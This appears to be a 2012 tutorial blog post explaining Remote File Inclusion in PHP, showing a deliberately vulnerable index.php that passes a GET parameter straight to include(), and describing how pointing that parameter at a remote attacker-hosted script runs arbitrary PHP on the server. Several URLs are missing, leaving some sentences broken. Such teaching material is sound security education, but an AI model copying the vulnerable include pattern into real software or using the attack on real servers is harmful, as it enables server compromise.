Friday, October 26, 2012

Webpage Structure and Remote File 



In this section, we will show how a web page is built up in general. A normal website consists of HTML. The HTML consists of a HEAD section and a BODY section.




(Normal looking website layout)

The image above is one of the most common website layouts ever.


<title>A Common Website Layout</title>
<div align="center" class="logo-area"></div>
<div align="center" class="navigation-area">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=page1">Page1</a>
<a href="index.php?page=page2">Page2</a>
<div align="center" class="main-content-area">
Content Content Content

This is one of an endless amount of ways you could build this website layout with HTML. It will have a logo, navigation, and a main content area. The navigation will have three links (Home, Page1 and Page2). But none of the links will do anything other than sending you to the same page over and over again without changing the content. This type of page is referred to as a static HTML page. The HTML of any page can be viewed by right clicking the page in your browser and the go to 'view source' or something similar. This is not true for viewing PHP code in web pages. The only way to view the PHP code of a page is if you can read the file itself, not from your browser. Commonly, RFI attacks are possible because of a PHP configuration flag called register_globals. It’s automatically defines variables in the script that are sent to the webpage with method GET. Typically PHP URL looks like: this is an example only, there is no such sites. Now we can rewrite the page above with PHP code in it, to make different content for each of the links (Home, Page1 and Page2).


<title>A Common Website Layout</title>
<div align="center" class="logo-area"></div>
<div align="center" class="navigation-area">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=page1">Page1</a>
<a href="index.php?page=page2">Page2</a>
<div align="center" class="main-content-area">

The first things the PHP code will look at GET method or arguments with the name “page” are present in the URL. If it is it will look further for the argument's value. If the value is "home", it will write out "home" to the HTML source. If the argument's value is "page1" it will write home "page1" to the HTML source and so on.However if the argument is not present in the URL, it will show index.php. So the script will give the equivalent value of the “home” page. Navigation link
Ø  Page2 goes to and so on.


In itself, they include() function is not vulnerable to anything. It’s wrong and dangerous use of it that causes the security issues. They include() function is not limited to reading local files. It can even read remote files from URL's. So you could do include ("") and it would include the contents of page.txt this is what creates RFI scenarios. Let’s create a new scenario index.php, 1.php, 2.php, and 3.php. index.php is the file the users are going to visit with his browser. When the user first visits the index.php, then we are going to display 3 links.


<a href="index.php?page=1">Page 1</a>
<a href="index.php?page=2">Page 2</a>
<a href="index.php?page=3">Page 3</a>

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php, look at the index.php script now the coding is to create security holes.


if (isset($_GET['page']))
// The GET argument is present. Lets include the page.
include($_GET['page'] . ".php");
// The GET argument is not present. Lets give the poor guy some links!
echo('<p><a href="index.php?page=1">Page 1</a></p>');
echo('<p><a href="index.php?page=2">Page 2</a></p>');
echo('<p><a href="index.php?page=3">Page 3</a></p>');

Now click the Page 1 link, it will show ( The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL GET argument + ".php" the same goes for 2 and 3. So, for Page 1 it will include 1.php, for Page 2 it will include 2.php and for Page 3 it will include 3.php. The above script is a death trap. Like (, it will try to include 4.php, but that file obviously does not exist. So the page would return an error message like this:

Warning: include (4.php) [function.include ]: failed to open stream : No such file or directory in PATH online 3
Warning: include () [function.include ]: Failed opening '4.php' for inclusion (include _path='.;PATH') in PATH\\index .php online 3

It’s important to note that, not all web servers will show error messages when there is an error. We will try this index.php?page= (this is an example only, there is no such sites). The PHP script would try to include whatever contains. And if hackercode.php contains more PHP code, it would also get executed. Meaning we can run any PHP command or function on the server. This is extremely dangerous. Now we will show .txt index.php?page=http:// and not hackerscript.txt.php because the ? Sign makes .php and GET argument.

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